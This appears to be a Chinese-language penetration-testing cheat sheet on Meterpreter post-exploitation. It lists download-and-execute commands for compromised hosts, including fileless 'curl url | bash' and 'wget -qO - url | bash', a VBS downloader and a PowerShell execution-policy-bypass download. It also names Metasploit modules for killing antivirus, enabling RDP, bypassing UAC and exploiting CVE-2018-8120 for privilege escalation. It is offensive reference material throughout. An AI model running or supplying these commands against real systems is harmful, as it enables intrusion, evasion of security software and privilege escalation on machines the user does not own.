meterpreter与提权

远程下载文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
linux:
wget URL
curl URL -o output_file_name
无文件传输:
wget -qO - url | bash
curl url | bash

windows:
vbs:
set post = CreateObject("Msxml2.XMLHTTP")
set shell = CreateObject("Wscript.Shell")
Post.open "GET","http://server_ip/fileName(要下载的文件)",0
Post.send()
set aGET = CreateObject("ADODB.Stream")
aGET.Mode = 3
aGET.Type = 1
aGET.Open()
aGET.Write(Post.responseBody)
aGet.SaveToFile "路径+要保存的名字 (c:\xx.exe)",2
执行: cscript xxx.vbs

powershell:
powershell -exec bypass -c (New-Object System.Net.WebClient).DownloadFile('URL/文件名','要保存的路径/文件名')


提权

后渗透模块:POST

漏洞探测:

​ 应用漏洞{版本漏洞,应用本身的缺陷….}

​ 服务漏洞{基于端口、基于系统服务…}

​ 系统内核漏洞{提权,cve-2018-8120}

后渗透模块:

show post 查看post模块

​ run windows/manage/killav 关闭杀软

​ windows/manage/enable_rdp 开放3389,(需要特权)

​ ….

提权:

​ uac提权: user account control 用户账户控制

​ exploit/windows/local/ask

​ 参数:name,session

​ bypassuac:

​ exploit/windows/local/bypassuac_eventvwr

​ exploit/windows/local/bypassuac_comhijack

​ exploit/windows/local/bypassuac_injection

​ exploit/windows/local/bypassuac_windows_store_filesys

​ 本地提权漏洞:

​ cve-2018-8120:exploit/windows/local/ms18_8120_win32k_privesc